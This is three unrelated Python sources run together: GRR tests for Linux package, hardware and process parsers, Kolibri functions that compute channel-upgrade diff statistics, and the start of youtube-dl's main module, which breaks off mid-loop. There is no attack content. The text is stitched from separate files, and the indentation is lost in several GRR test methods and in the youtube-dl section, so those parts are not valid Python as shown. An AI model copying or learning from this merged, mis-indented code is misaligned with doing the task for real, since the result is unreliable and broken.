            name="NetworkManager-tui",
            architecture="x86_64",
            version="1:1.8.0-12.el7_4",
            publisher="@rhui-rhel-7-server-e4s-rhui-rpms"),
        rdf_client.SoftwarePackage.Installed(
            name="Red_Hat_Enterprise_Linux-Release_Notes-7-en-US",
            architecture="noarch",
            version="7-2.el7",
            publisher="@anaconda"),
        rdf_client.SoftwarePackage.Installed(
            name="cronie-anacron",
            architecture="x86_64",
            version="1.4.11-17.el7",
            publisher="@anaconda"),
        rdf_client.SoftwarePackage.Installed(
            name="crontabs",
            architecture="noarch",
            version="1.11-6.20121102git.el7",
            publisher="@anaconda"),
        rdf_client.SoftwarePackage.Installed(
            name="device-mapper",
            architecture="x86_64",
            version="7:1.02.140-8.el7",
            publisher="@anaconda"),
        rdf_client.SoftwarePackage.Installed(
            name="device-mapper-event",
            architecture="x86_64",
            version="7:1.02.140-8.el7",
            publisher="@rhui-rhel-7-server-e4s-rhui-rpms"),
        rdf_client.SoftwarePackage.Installed(
            name="device-mapper-event-libs",
            architecture="x86_64",
            version="7:1.02.140-8.el7",
            publisher="@rhui-rhel-7-server-e4s-rhui-rpms"),
        rdf_client.SoftwarePackage.Installed(
            name="device-mapper-libs",
            architecture="x86_64",
            version="7:1.02.140-8.el7",
            publisher="@anaconda"),
        rdf_client.SoftwarePackage.Installed(
            name="device-mapper-persistent-data",
            architecture="x86_64",
            version="0.7.0-0.1.rc6.el7_4.1",
            publisher="@rhui-rhel-7-server-e4s-rhui-rpms"),
        rdf_client.SoftwarePackage.Installed(
            name="dhclient",
            architecture="x86_64",
            version="12:4.2.5-58.el7_4.4",
            publisher="@rhui-rhel-7-server-e4s-rhui-rpms"),
        rdf_client.SoftwarePackage.Installed(
            name="dhcp-common",
            architecture="x86_64",
            version="12:4.2.5-58.el7_4.4",
            publisher="@rhui-rhel-7-server-e4s-rhui-rpms"),
    ])

  @staticmethod
  def _Parse(output):
    # Helper: run the parser on `output` and return the package list from
    # the single expected result.
    parser = linux_cmd_parser.YumListCmdParser()
    parsed = list(
        parser.Parse(
            cmd="yum",
            args=["list installed"],
            stdout=output.encode("utf-8"),
            stderr=b"",
            return_val=0,
            knowledge_base=None))
    return parsed[0].packages
class LinuxCmdParserTest(test_lib.GRRBaseTest):
"""Test parsing of linux command output."""
  def testYumListCmdParser(self):
    """Ensure we can extract packages from yum output."""
    parser = linux_cmd_parser.YumListCmdParser()
    # Fixture file with canned `yum list installed` output.
    content = open(os.path.join(self.base_path, "yum.out"), "rb").read()
    out = list(
        parser.Parse("/usr/bin/yum", ["list installed -q"], content, "", 0,
                     None))
    self.assertLen(out, 1)
    self.assertLen(out[0].packages, 2)
    package = out[0].packages[0]
    self.assertIsInstance(package, rdf_client.SoftwarePackage)
    self.assertEqual(package.name, "ConsoleKit")
    self.assertEqual(package.architecture, "x86_64")
    self.assertEqual(package.publisher, "@base")
  def testYumRepolistCmdParser(self):
    """Test to see if we can get data from yum repolist output."""
    parser = linux_cmd_parser.YumRepolistCmdParser()
    # Fixture file with canned `yum repolist -v -q` output.
    content = open(os.path.join(self.base_path, "repolist.out"), "rb").read()
    repolist = list(
        parser.Parse("/usr/bin/yum", ["repolist", "-v", "-q"], content, "", 0,
                     None))
    # Every field of the first repository entry should round-trip.
    self.assertIsInstance(repolist[0], rdf_client.PackageRepository)
    self.assertEqual(repolist[0].id, "rhel")
    self.assertEqual(repolist[0].name, "rhel repo")
    self.assertEqual(repolist[0].revision, "1")
    self.assertEqual(repolist[0].last_update, "Sun Mar 15 08:51:32")
    self.assertEqual(repolist[0].num_packages, "12")
    self.assertEqual(repolist[0].size, "8 GB")
    self.assertEqual(repolist[0].baseurl, "http://rhel/repo")
    self.assertEqual(repolist[0].timeout,
                     "1200 second(s) (last: Mon Apr 1 20:30:02 2016)")
    self.assertLen(repolist, 2)
def testRpmCmdParser(self):
"""Ensure we can extract packages from rpm output."""
parser = linux_cmd_parser.RpmCmdParser()
content = """
glib2-2.12.3-4.el5_3.1
elfutils-libelf-0.137-3.el5
libgpg-error-1.4-2
keyutils-libs-1.2-1.el5
less-436-9.el5
libstdc++-devel-4.1.2-55.el5
gcc-c++-4.1.2-55.el5
-not-valid.123.el5
"""
stderr = "error: rpmdbNextIterator: skipping h#"
out = list(parser.Parse("/bin/rpm", ["-qa"], content, stderr, 0, None))
# A package list and an Anomaly.
self.assertLen(out, 2)
anomaly = [o for o in out if isinstance(o, rdf_anomaly.Anomaly)]
self.assertLen(anomaly, 1)
package_lists = [
o for o in out if isinstance(o, rdf_client.SoftwarePackages)
]
self.assertLen(package_lists, 1)
package_list = package_lists[0]
self.assertLen(package_list.packages, 7)
software = {o.name: o.version for o in package_list.packages}
expected = {
"glib2": "2.12.3-4.el5_3.1",
"elfutils-libelf": "0.137-3.el5",
"libgpg-error": "1.4-2",
"keyutils-libs": "1.2-1.el5",
"less": "436-9.el5",
"libstdc++-devel": "4.1.2-55.el5",
"gcc-c++": "4.1.2-55.el5"
}
self.assertCountEqual(expected, software)
self.assertEqual("Broken rpm database.", anomaly[0].symptom)
def testDpkgCmdParser(self):
"""Ensure we can extract packages from dpkg output."""
parser = linux_cmd_parser.DpkgCmdParser()
content = open(os.path.join(self.base_path, "checks/data/dpkg.out"),
"rb").read()
out = list(parser.Parse("/usr/bin/dpkg", ["--list"], content, "", 0, None))
self.assertLen(out, 1)
package_list = out[0]
self.assertLen(package_list.packages, 181)
self.assertEqual(
package_list.packages[0],
rdf_client.SoftwarePackage(
name="acpi-support-base",
description="scripts for handling base ACPI events such as the power button",
version="0.140-5",
architecture="all",
install_state=rdf_client.SoftwarePackage.InstallState.INSTALLED))
self.assertEqual(
package_list.packages[22],
rdf_client.SoftwarePackage(
name="diffutils",
description=None, # Test package with empty description.
version="1:3.2-6",
architecture="amd64",
install_state=rdf_client.SoftwarePackage.InstallState.INSTALLED))
def testDpkgCmdParserPrecise(self):
"""Ensure we can extract packages from dpkg output on ubuntu precise."""
parser = linux_cmd_parser.DpkgCmdParser()
content = open(
os.path.join(self.base_path, "checks/data/dpkg.precise.out"),
"rb").read()
out = list(parser.Parse("/usr/bin/dpkg", ["--list"], content, "", 0, None))
self.assertLen(out, 1)
package_list = out[0]
self.assertLen(package_list.packages, 30)
self.assertEqual(
package_list.packages[0],
rdf_client.SoftwarePackage(
name="adduser",
description="add and remove users and groups",
version="3.113ubuntu2",
architecture=None,
install_state=rdf_client.SoftwarePackage.InstallState.INSTALLED))
self.assertEqual(
package_list.packages[12],
rdf_client.SoftwarePackage(
name="diffutils",
description=None, # Test package with empty description.
version="1:3.2-1ubuntu1",
architecture=None,
install_state=rdf_client.SoftwarePackage.InstallState.INSTALLED))
def testDmidecodeParser(self):
"""Test to see if we can get data from dmidecode output."""
parser = linux_cmd_parser.DmidecodeCmdParser()
content = open(os.path.join(self.base_path, "dmidecode.out"), "rb").read()
parse_result = list(
parser.Parse("/usr/sbin/dmidecode", ["-q"], content, "", 0, None))
self.assertLen(parse_result, 1)
hardware = parse_result[0]
self.assertIsInstance(hardware, rdf_client.HardwareInfo)
self.assertEqual(hardware.serial_number, "2UA25107BB")
self.assertEqual(hardware.system_manufacturer, "Hewlett-Packard")
self.assertEqual(hardware.system_product_name, "HP Z420 Workstation")
self.assertEqual(hardware.system_uuid,
"4596BF80-41F0-11E2-A3B4-10604B5C7F38")
self.assertEqual(hardware.system_sku_number, "C2R51UC#ABA")
self.assertEqual(hardware.system_family, "103C_53335X G=D")
self.assertEqual(hardware.bios_vendor, "Hewlett-Packard")
self.assertEqual(hardware.bios_version, "J61 v02.08")
self.assertEqual(hardware.bios_release_date, "10/17/2012")
self.assertEqual(hardware.bios_rom_size, "16384 kB")
self.assertEqual(hardware.bios_revision, "2.8")
class PsCmdParserTest(absltest.TestCase):
  """Tests for the `ps -ef` output parser."""

  def _AssertProcessesMatch(self, processes, expected):
    """Checks parsed processes against expected field tuples.

    Args:
      processes: parsed process objects, in output order.
      expected: a list of (username, pid, ppid, cpu_percent, terminal,
        cmdline) tuples, one per expected process.
    """
    self.assertLen(processes, len(expected))
    for process, (username, pid, ppid, cpu_percent, terminal,
                  cmdline) in zip(processes, expected):
      self.assertEqual(process.username, username)
      self.assertEqual(process.pid, pid)
      self.assertEqual(process.ppid, ppid)
      self.assertEqual(process.cpu_percent, cpu_percent)
      self.assertEqual(process.terminal, terminal)
      self.assertEqual(process.cmdline, cmdline)

  def testRealOutput(self):
    stdout = """\
UID          PID    PPID  C STIME TTY          TIME CMD
root           1       0  0 Oct02 ?        00:01:35 /sbin/init splash
root           2       0  0 Oct02 ?        00:00:00 [kthreadd]
root           5       2  0 Oct02 ?        00:00:00 [kworker/0:0H]
colord     68931       1  0 Oct02 ?        00:00:00 /usr/lib/colord/colord
foobar     69081   69080  1 Oct02 ?        02:08:49 cinnamon --replace
"""
    processes = list(
        linux_cmd_parser.PsCmdParser().Parse("/bin/ps", "-ef", stdout, "", 0,
                                             None))
    self._AssertProcessesMatch(processes, [
        ("root", 1, 0, 0.0, "?", ["/sbin/init", "splash"]),
        ("root", 2, 0, 0.0, "?", ["[kthreadd]"]),
        ("root", 5, 2, 0.0, "?", ["[kworker/0:0H]"]),
        ("colord", 68931, 1, 0.0, "?", ["/usr/lib/colord/colord"]),
        ("foobar", 69081, 69080, 1.0, "?", ["cinnamon", "--replace"]),
    ])

  def testDoesNotFailOnIncorrectInput(self):
    stdout = """\
UID          PID    PPID  C STIME TTY          TIME CMD
foo            1       0  0 Sep01 ?        00:01:23 /baz/norf
bar            2       1  0 Sep02 ?        00:00:00 /baz/norf --thud --quux
THIS IS AN INVALID LINE
quux           5       2  0 Sep03 ?        00:00:00 /blargh/norf
quux         ???     ???  0 Sep04 ?        00:00:00 ???
foo            4       2  0 Sep05 ?        00:00:00 /foo/bar/baz --quux=1337
"""
    processes = list(
        linux_cmd_parser.PsCmdParser().Parse("/bin/ps", "-ef", stdout, "", 0,
                                             None))
    # The two malformed rows are skipped; the four valid rows survive.
    self._AssertProcessesMatch(processes, [
        ("foo", 1, 0, 0, "?", ["/baz/norf"]),
        ("bar", 2, 1, 0, "?", ["/baz/norf", "--thud", "--quux"]),
        ("quux", 5, 2, 0, "?", ["/blargh/norf"]),
        ("foo", 4, 2, 0, "?", ["/foo/bar/baz", "--quux=1337"]),
    ])
def main(args):
  """Entry point handed to `app.run`: delegates to the GRR test runner."""
  test_lib.main(args)
# Run the test suite only when executed directly (not on import).
if __name__ == "__main__":
  app.run(main)
| |
import logging
import os
from django.core.management import call_command
from le_utils.constants import content_kinds
from sqlalchemy import and_
from sqlalchemy import func
from sqlalchemy import or_
from sqlalchemy import select
from kolibri.core.content.constants.schema_versions import CURRENT_SCHEMA_VERSION
from kolibri.core.content.models import ContentNode
from kolibri.core.content.models import File
from kolibri.core.content.models import LocalFile
from kolibri.core.content.utils import annotation
from kolibri.core.content.utils import channel_import
from kolibri.core.content.utils.annotation import CONTENT_APP_NAME
from kolibri.core.content.utils.channels import CHANNEL_UPDATE_STATS_CACHE_KEY
from kolibri.core.content.utils.channels import get_mounted_drive_by_id
from kolibri.core.content.utils.content_types_tools import (
renderable_contentnodes_q_filter,
)
from kolibri.core.content.utils.content_types_tools import renderable_files_presets
from kolibri.core.content.utils.importability_annotation import (
get_channel_stats_from_disk,
)
from kolibri.core.content.utils.importability_annotation import (
get_channel_stats_from_peer,
)
from kolibri.core.content.utils.paths import get_annotated_content_database_file_path
from kolibri.core.content.utils.paths import get_upgrade_content_database_file_path
from kolibri.core.content.utils.sqlalchemybridge import Bridge
from kolibri.core.content.utils.sqlalchemybridge import coerce_key
from kolibri.core.content.utils.sqlalchemybridge import filter_by_uuids
from kolibri.core.tasks.exceptions import UserCancelledError
from kolibri.core.tasks.utils import get_current_job
from kolibri.core.utils.cache import process_cache
logger = logging.getLogger(__name__)
def clear_diff_stats(channel_id):
    """Delete the cached upgrade diff stats for ``channel_id`` from the process cache."""
    process_cache.delete(CHANNEL_UPDATE_STATS_CACHE_KEY.format(channel_id))
def diff_stats(channel_id, method, drive_id=None, baseurl=None):
    """
    Download the channel database to an upgraded path.
    Annotate the local file availability of the upgraded channel db.
    Calculate diff stats comparing default db and annotated channel db.

    The computed stats are stored in the process cache (keyed by
    ``CHANNEL_UPDATE_STATS_CACHE_KEY``) and, when run inside a task, in the
    current job's ``extra_metadata``.

    :param channel_id: id of the channel to compute upgrade diff stats for
    :param method: "network" (download via ``baseurl``) or "disk" (copy from
        the mounted drive identified by ``drive_id``); any other value skips
        the import step entirely
    :param drive_id: id of a mounted drive; only used when method == "disk"
    :param baseurl: remote server URL; only used when method == "network"
    :raises UserCancelledError: re-raised after cleaning up the annotated db
        if the user cancels the underlying import
    """
    # upgraded content database path
    source_path = get_upgrade_content_database_file_path(channel_id)
    # annotated db to be used for calculating diff stats
    destination_path = get_annotated_content_database_file_path(channel_id)
    try:
        if method == "network":
            call_command(
                "importchannel", "network", channel_id, baseurl=baseurl, no_upgrade=True
            )
        elif method == "disk":
            drive = get_mounted_drive_by_id(drive_id)
            call_command(
                "importchannel", "disk", channel_id, drive.datafolder, no_upgrade=True
            )
        # create all fields/tables at the annotated destination db, based on the current schema version
        bridge = Bridge(
            sqlite_file_path=destination_path, schema_version=CURRENT_SCHEMA_VERSION
        )
        bridge.Base.metadata.create_all(bridge.engine)
        # initialize import manager based on annotated destination path, pulling from source db path
        import_manager = channel_import.initialize_import_manager(
            channel_id,
            cancel_check=False,
            source=source_path,
            destination=destination_path,
        )
        # import channel data from source db path
        import_manager.import_channel_data()
        import_manager.end()
        # annotate file availability on destination db
        annotation.set_local_file_availability_from_disk(destination=destination_path)
        # get the diff count between whats on the default db and the annotated db
        (
            new_resource_ids,
            new_resource_content_ids,
            new_resource_total_size,
        ) = get_new_resources_available_for_import(destination_path, channel_id)
        # get the count for leaf nodes which are in the default db, but not in the annotated db
        resources_to_be_deleted_count = count_removed_resources(
            destination_path, channel_id
        )
        # get the ids of leaf nodes which are now incomplete due to missing local files
        (
            updated_resource_ids,
            updated_resource_content_ids,
            updated_resource_total_size,
        ) = get_automatically_updated_resources(destination_path, channel_id)
        # remove the annotated database; best-effort, a failure is only logged
        try:
            os.remove(destination_path)
        except OSError as e:
            logger.info(
                "Tried to remove {}, but exception {} occurred.".format(
                    destination_path, e
                )
            )
        # annotate job metadata with diff stats
        job = get_current_job()
        if job:
            job.extra_metadata["new_resources_count"] = len(new_resource_content_ids)
            job.extra_metadata[
                "deleted_resources_count"
            ] = resources_to_be_deleted_count
            job.extra_metadata["updated_resources_count"] = len(
                updated_resource_content_ids
            )
            job.save_meta()
        CACHE_KEY = CHANNEL_UPDATE_STATS_CACHE_KEY.format(channel_id)
        process_cache.set(
            CACHE_KEY,
            {
                "new_resource_ids": new_resource_ids,
                "new_resource_content_ids": new_resource_content_ids,
                "new_resource_total_size": new_resource_total_size,
                "updated_resource_ids": updated_resource_ids,
                "updated_resource_content_ids": updated_resource_content_ids,
                "updated_resource_total_size": updated_resource_total_size,
            },
            # Should persist until explicitly cleared (at content import)
            # or until server restart.
            None,
        )
    except UserCancelledError:
        # remove the partially annotated database before propagating the cancel
        try:
            os.remove(destination_path)
        except OSError:
            pass
        raise
batch_size = 1000
def get_new_resources_available_for_import(destination, channel_id):
    """
    Queries the destination db to get leaf nodes.
    Subtract total number of leaf nodes by the count of leaf nodes on default db to get the number of new resources.

    :param destination: path to the annotated (upgraded) sqlite channel db
    :param channel_id: id of the channel being compared against the default db
    :returns: tuple of (new resource node ids, new resource content ids,
        total file size in bytes of the new renderable resources)
    """
    bridge = Bridge(app_name=CONTENT_APP_NAME, sqlite_file_path=destination)
    # SQL Alchemy reference to the content node table
    ContentNodeTable = bridge.get_table(ContentNode)
    # SQL Alchemy reference to the file table - a mapping from
    # contentnodes to the files that they use
    FileTable = bridge.get_table(File)
    # SQL Alchemy reference to the localfile table which tracks
    # information about the files on disk, such as availability
    LocalFileTable = bridge.get_table(LocalFile)
    connection = bridge.get_connection()
    # To efficiently get the node ids of all new nodes in the channel
    # we are going to iterate over the currently existing nodes for the
    # channel in the default database, and cache their existence in the
    # temporary upgrade database by flagging them as 'available' in there
    # We can then read out all of the unavailable ContentNodes in order
    # to get a complete list of the newly available ids.
    # We wrap this all in a transaction so that we can roll it back afterwards
    # but this is mostly just not to leave the upgrade DB in a messy state
    # and could be removed if it becomes a performance concern
    # Create a queryset for the node ids of resources currently in this channel
    # we will slice this later in a while loop in order to efficiently process this
    # this is necessary otherwise we would end up querying tens of thousands of node ids
    # for a large channel, which would then be impossible to pass into an update query
    # for the temporary upgrade DB without causing an excessively large query
    # greater than 1MB, which is the default max for SQLite
    current_resource_node_id_queryset = (
        ContentNode.objects.filter(channel_id=channel_id)
        .exclude(kind=content_kinds.TOPIC)
        .values_list("id", flat=True)
    )
    i = 0
    # start a transaction
    trans = connection.begin()
    # Set everything to False to start with
    connection.execute(
        ContentNodeTable.update()
        .where(ContentNodeTable.c.channel_id == channel_id)
        .values(available=False)
    )
    node_ids = current_resource_node_id_queryset[i : i + batch_size]
    while node_ids:
        # Flag nodes that already exist in the default db as 'available'
        connection.execute(
            ContentNodeTable.update()
            .where(
                and_(
                    filter_by_uuids(
                        ContentNodeTable.c.id, node_ids, vendor=bridge.engine.name
                    ),
                    ContentNodeTable.c.channel_id == channel_id,
                )
            )
            .values(available=True)
        )
        i += batch_size
        node_ids = current_resource_node_id_queryset[i : i + batch_size]
    # Subquery: contentnode ids that have at least one renderable, primary file
    renderable_contentnodes = (
        select([FileTable.c.contentnode_id])
        .where(FileTable.c.supplementary == False) # noqa
        .where(
            or_(*(FileTable.c.preset == preset for preset in renderable_files_presets))
        )
    )
    # 'available == False' here means: not flagged above, i.e. new in this channel version
    contentnode_filter_expression = and_(
        ContentNodeTable.c.channel_id == channel_id,
        ContentNodeTable.c.kind != content_kinds.TOPIC,
        ContentNodeTable.c.available == False, # noqa
        ContentNodeTable.c.id.in_(renderable_contentnodes),
    )
    new_resource_nodes_total_size = (
        connection.execute(
            # This does the first step in the many to many lookup for File
            select([func.sum(LocalFileTable.c.file_size)]).where(
                LocalFileTable.c.id.in_(
                    select([LocalFileTable.c.id])
                    .select_from(
                        # and LocalFile.
                        LocalFileTable.join(
                            FileTable.join(
                                ContentNodeTable,
                                FileTable.c.contentnode_id == ContentNodeTable.c.id,
                            ), # This does the actual correlation between file and local file
                            FileTable.c.local_file_id == LocalFileTable.c.id,
                        )
                    )
                    .where(
                        and_(
                            # Filter only for files that are unavailable so we show
                            # the import size
                            LocalFileTable.c.available == False, # noqa
                            contentnode_filter_expression,
                        )
                    )
                )
            )
        ).fetchone()[0]
        # SUM over zero rows yields NULL/None, so coerce to 0
        or 0
    )
    new_resource_node_ids_statement = select([ContentNodeTable.c.id]).where(
        and_(
            ContentNodeTable.c.channel_id == channel_id,
            ContentNodeTable.c.kind != content_kinds.TOPIC,
            ContentNodeTable.c.available == False, # noqa
        )
    )
    new_resource_node_ids = list(
        coerce_key(c[0])
        for c in connection.execute(new_resource_node_ids_statement).fetchall()
    )
    # Undo the availability flagging so the upgrade db is left untouched
    trans.rollback()
    # Create a queryset for the content_ids of resources currently in this channel
    # we will slice this later in a while loop in order to efficiently process this
    # this is necessary otherwise we would end up querying tens of thousands of node ids
    # for a large channel, which would then be impossible to pass into an update query
    # for the temporary upgrade DB without causing an excessively large query
    # greater than 1MB, which is the default max for SQLite
    current_resource_content_id_queryset = (
        ContentNode.objects.filter(channel_id=channel_id)
        .exclude(kind=content_kinds.TOPIC)
        .values_list("content_id", flat=True)
    )
    i = 0
    # start a transaction
    trans = connection.begin()
    # Set everything to False to start with
    connection.execute(
        ContentNodeTable.update()
        .where(ContentNodeTable.c.channel_id == channel_id)
        .values(available=False)
    )
    content_ids = current_resource_content_id_queryset[i : i + batch_size]
    while content_ids:
        # Flag content ids that already exist in the default db as 'available'
        connection.execute(
            ContentNodeTable.update()
            .where(
                and_(
                    filter_by_uuids(
                        ContentNodeTable.c.content_id,
                        content_ids,
                        vendor=bridge.engine.name,
                    ),
                    ContentNodeTable.c.channel_id == channel_id,
                )
            )
            .values(available=True)
        )
        i += batch_size
        content_ids = current_resource_content_id_queryset[i : i + batch_size]
    new_resource_content_ids_statement = (
        select([ContentNodeTable.c.content_id])
        .where(
            and_(
                ContentNodeTable.c.channel_id == channel_id,
                ContentNodeTable.c.kind != content_kinds.TOPIC,
                ContentNodeTable.c.available == False, # noqa
            )
        )
        .distinct()
    )
    new_resource_content_ids = list(
        coerce_key(c[0])
        for c in connection.execute(new_resource_content_ids_statement).fetchall()
    )
    # NOTE(review): the Bridge/connection is never explicitly closed here —
    # confirm the Bridge releases its sqlite handle on garbage collection.
    trans.rollback()
    return (
        new_resource_node_ids,
        new_resource_content_ids,
        new_resource_nodes_total_size,
    )
def count_removed_resources(destination, channel_id):
    """
    Queries the destination db to get the leaf node content_ids.
    Subtract available leaf nodes count on default db by available
    leaf nodes based on destination db leaf node content_ids.

    :param destination: path to the annotated (upgraded) sqlite channel db
    :param channel_id: id of the channel being compared
    :returns: number of currently-available resources that would disappear
        after the upgrade (can't go negative in practice, as the upgrade set
        is derived from nodes present in the destination db)
    """
    bridge = Bridge(app_name=CONTENT_APP_NAME, sqlite_file_path=destination)
    connection = bridge.get_connection()
    ContentNodeTable = bridge.get_table(ContentNode)
    # Paged statement over the leaf node ids in the upgraded db
    resource_node_ids_statement = (
        select([ContentNodeTable.c.id])
        .where(
            and_(
                ContentNodeTable.c.channel_id == channel_id,
                ContentNodeTable.c.kind != content_kinds.TOPIC,
            )
        )
        .limit(batch_size)
    )
    i = 0
    resource_node_ids = [
        coerce_key(cid[0])
        for cid in connection.execute(resource_node_ids_statement.offset(i)).fetchall()
    ]
    content_ids_after_upgrade = set()
    # Batch the query here, as passing too many uuids into Django could cause
    # a SQL-query-too-large error. This will happen around about 30000+ uuids.
    # Could probably batch at 10000 rather than 1000 - but using 1000 to be defensive.
    while resource_node_ids:
        content_ids_after_upgrade.update(
            (
                ContentNode.objects.filter_by_uuids(resource_node_ids, validate=False)
                .exclude(kind=content_kinds.TOPIC)
                .filter(available=True, channel_id=channel_id)
                .values_list("content_id", flat=True)
                .distinct()
            )
        )
        i += batch_size
        resource_node_ids = [
            coerce_key(cid[0])
            for cid in connection.execute(
                resource_node_ids_statement.offset(i)
            ).fetchall()
        ]
    total_resources_after_upgrade = len(content_ids_after_upgrade)
    # Distinct available content_ids currently in the default db, minus those
    # that will still exist after the upgrade, gives the removed count.
    return (
        ContentNode.objects.filter(channel_id=channel_id, available=True)
        .exclude(kind=content_kinds.TOPIC)
        .values("content_id")
        .distinct()
        .count()
        - total_resources_after_upgrade
    )
def get_automatically_updated_resources(destination, channel_id):
    """
    Queries the destination db to get the leaf node ids, where local file objects are unavailable.
    Get the available node ids related to those missing file objects.

    :param destination: path to the annotated (upgraded) sqlite channel db
    :param channel_id: id of the channel being compared
    :returns: tuple of (updated resource node ids, updated resource content
        ids, total file size in bytes of the unavailable files for those
        resources)
    """
    bridge = Bridge(app_name=CONTENT_APP_NAME, sqlite_file_path=destination)
    connection = bridge.get_connection()
    ContentNodeTable = bridge.get_table(ContentNode)
    # SQL Alchemy reference to the file table - a mapping from
    # contentnodes to the files that they use
    FileTable = bridge.get_table(File)
    # SQL Alchemy reference to the localfile table which tracks
    # information about the files on disk, such as availability
    LocalFileTable = bridge.get_table(LocalFile)
    # get unavailable local file ids on the destination db
    unavailable_local_file_ids_statement = select([LocalFileTable.c.id]).where(
        LocalFileTable.c.available == False # noqa
    )
    # get the Contentnode ids where File objects are missing in the destination db
    contentnode_ids_statement = (
        select([FileTable.c.contentnode_id])
        .where(
            and_(
                FileTable.c.local_file_id.in_(unavailable_local_file_ids_statement),
                FileTable.c.supplementary == False, # noqa
                or_(
                    *(
                        FileTable.c.preset == preset
                        for preset in renderable_files_presets
                    )
                ),
            )
        )
        .limit(batch_size)
    )
    i = 0
    updated_resource_ids = set()
    updated_resource_content_ids = set()
    contentnode_ids = [
        coerce_key(cid[0])
        for cid in connection.execute(contentnode_ids_statement.offset(i)).fetchall()
    ]
    while contentnode_ids:
        # Exclude topics from here to prevent erroneous imports of their children
        # This should already be excluded as we are filtering to renderable files
        # so this is more of a sanity check
        for c in (
            ContentNode.objects.filter_by_uuids(contentnode_ids, validate=False)
            .filter(available=True, channel_id=channel_id)
            .exclude(kind=content_kinds.TOPIC)
            .values_list("id", "content_id")
        ):
            updated_resource_ids.add(c[0])
            updated_resource_content_ids.add(c[1])
        i += batch_size
        contentnode_ids = [
            coerce_key(cid[0])
            for cid in connection.execute(
                contentnode_ids_statement.offset(i)
            ).fetchall()
        ]
    # Do this after we have fetched all the ids and made them unique
    # otherwise, because we are getting our ids from the File table, we could
    # end up with a duplicate count of file sizes
    updated_resources_total_size = 0
    i = 0
    # Coerce to lists
    updated_resource_ids = list(updated_resource_ids)
    updated_resource_content_ids = list(updated_resource_content_ids)
    ids_batch = updated_resource_ids[i : i + batch_size]
    while ids_batch:
        contentnode_filter_expression = filter_by_uuids(
            ContentNodeTable.c.id, ids_batch, vendor=bridge.engine.name
        )
        # This does the first step in the many to many lookup for File
        updated_resources_total_size += (
            connection.execute(
                select([func.sum(LocalFileTable.c.file_size)]).where(
                    LocalFileTable.c.id.in_(
                        select([LocalFileTable.c.id])
                        .select_from(
                            # and LocalFile.
                            LocalFileTable.join(
                                FileTable.join(
                                    ContentNodeTable,
                                    FileTable.c.contentnode_id == ContentNodeTable.c.id,
                                ), # This does the actual correlation between file and local file
                                FileTable.c.local_file_id == LocalFileTable.c.id,
                            )
                        )
                        .where(
                            and_(
                                # Filter only for files that are unavailable so we show
                                # the import size
                                LocalFileTable.c.available == False, # noqa
                                contentnode_filter_expression,
                            )
                        )
                    )
                )
            ).fetchone()[0]
            # SUM over zero matching rows yields NULL/None; guard with `or 0`
            # (matches get_new_resources_available_for_import) so that a batch
            # with no unavailable files cannot raise a TypeError on `+=`.
            or 0
        )
        i += batch_size
        ids_batch = updated_resource_ids[i : i + batch_size]
    return (
        updated_resource_ids,
        updated_resource_content_ids,
        updated_resources_total_size,
    )
def get_import_data_for_update(
    channel_id, drive_id=None, peer_id=None, renderable_only=True
):
    """
    Work out which files must be transferred to apply a pending channel update.

    Reads the diff stats previously computed by ``diff_stats`` from the
    process cache.

    :param channel_id: id of the channel being updated
    :param drive_id: if set, only consider nodes importable from this drive
    :param peer_id: if set, only consider nodes importable from this peer
    :param renderable_only: when True, restrict to nodes this device can render
    :returns: tuple of (count of distinct updated content ids, list of
        LocalFile objects to transfer, total bytes to transfer)
    :raises ValueError: if no precalculated update stats exist for the channel
    """
    update_stats = process_cache.get(CHANNEL_UPDATE_STATS_CACHE_KEY.format(channel_id))
    if not update_stats:
        raise ValueError(
            "Tried to get update content nodes for channel {} that has no precalculated update stats".format(
                channel_id
            )
        )
    # By default don't filter node ids by their underlying file importability
    file_based_node_id_dict = None
    if drive_id:
        file_based_node_id_dict = get_channel_stats_from_disk(channel_id, drive_id)
    if peer_id:
        file_based_node_id_dict = get_channel_stats_from_peer(channel_id, peer_id)
    updated_resource_ids = update_stats.get("updated_resource_ids", [])
    i = 0
    updated_ids_slice = updated_resource_ids[i : i + batch_size]
    nodes_to_include = ContentNode.objects.filter(channel_id=channel_id)
    # if requested, filter out nodes we're not able to render
    if renderable_only:
        nodes_to_include = nodes_to_include.filter(renderable_contentnodes_q_filter)
    queried_file_objects = []
    content_ids = set()
    while updated_ids_slice:
        if file_based_node_id_dict is not None:
            # If we have a list of limited node id availability limit our slice here
            updated_ids_slice = list(
                filter(lambda x: x in file_based_node_id_dict, updated_ids_slice)
            )
        # Possible that the above filtering rendered our list empty, so skip queries
        # in that case
        if updated_ids_slice:
            batch_nodes = nodes_to_include.filter_by_uuids(updated_ids_slice)
            content_ids.update(
                batch_nodes.values_list("content_id", flat=True).distinct()
            )
            files_to_transfer = LocalFile.objects.filter(
                available=False, files__contentnode__in=batch_nodes
            )
            queried_file_objects.extend(files_to_transfer)
        i += batch_size
        updated_ids_slice = updated_resource_ids[i : i + batch_size]
    # Get all nodes that are marked as available but have missing files.
    # This will ensure that we update thumbnails, and other files.
    queried_file_objects.extend(
        LocalFile.objects.filter(
            available=False,
            files__contentnode__in=ContentNode.objects.filter(
                available=True, channel_id=channel_id
            ),
        )
    )
    # Deduplicate by file id while summing the total transfer size.
    checksums = set()
    total_bytes_to_transfer = 0
    files_to_download = []
    for file in queried_file_objects:
        if file.id not in checksums:
            checksums.add(file.id)
            total_bytes_to_transfer += file.file_size
            files_to_download.append(file)
    return len(content_ids), files_to_download, total_bytes_to_transfer
| |
#!/usr/bin/env python
# -*- coding: utf-8 -*-
from __future__ import unicode_literals
__license__ = 'Public Domain'
import codecs
import io
import os
import random
import sys
from .options import (
parseOpts,
)
from .compat import (
compat_expanduser,
compat_getpass,
compat_print,
compat_shlex_split,
workaround_optparse_bug9161,
)
from .utils import (
DateRange,
decodeOption,
DEFAULT_OUTTMPL,
DownloadError,
match_filter_func,
MaxDownloadsReached,
preferredencoding,
read_batch_urls,
SameFileError,
setproctitle,
std_headers,
write_string,
)
from .update import update_self
from .downloader import (
FileDownloader,
)
from .extractor import gen_extractors, list_extractors
from .YoutubeDL import YoutubeDL
def _real_main(argv=None):
# Compatibility fixes for Windows
if sys.platform == 'win32':
# https://github.com/rg3/youtube-dl/issues/820
codecs.register(lambda name: codecs.lookup('utf-8') if name == 'cp65001' else None)
workaround_optparse_bug9161()
setproctitle('youtube-dl')
parser, opts, args = parseOpts(argv)
# Set user agent
if opts.user_agent is not None:
std_headers['User-Agent'] = opts.user_agent
# Set referer
if opts.referer is not None:
std_headers['Referer'] = opts.referer
# Custom HTTP headers
if opts.headers is not None:
for h in opts.headers:
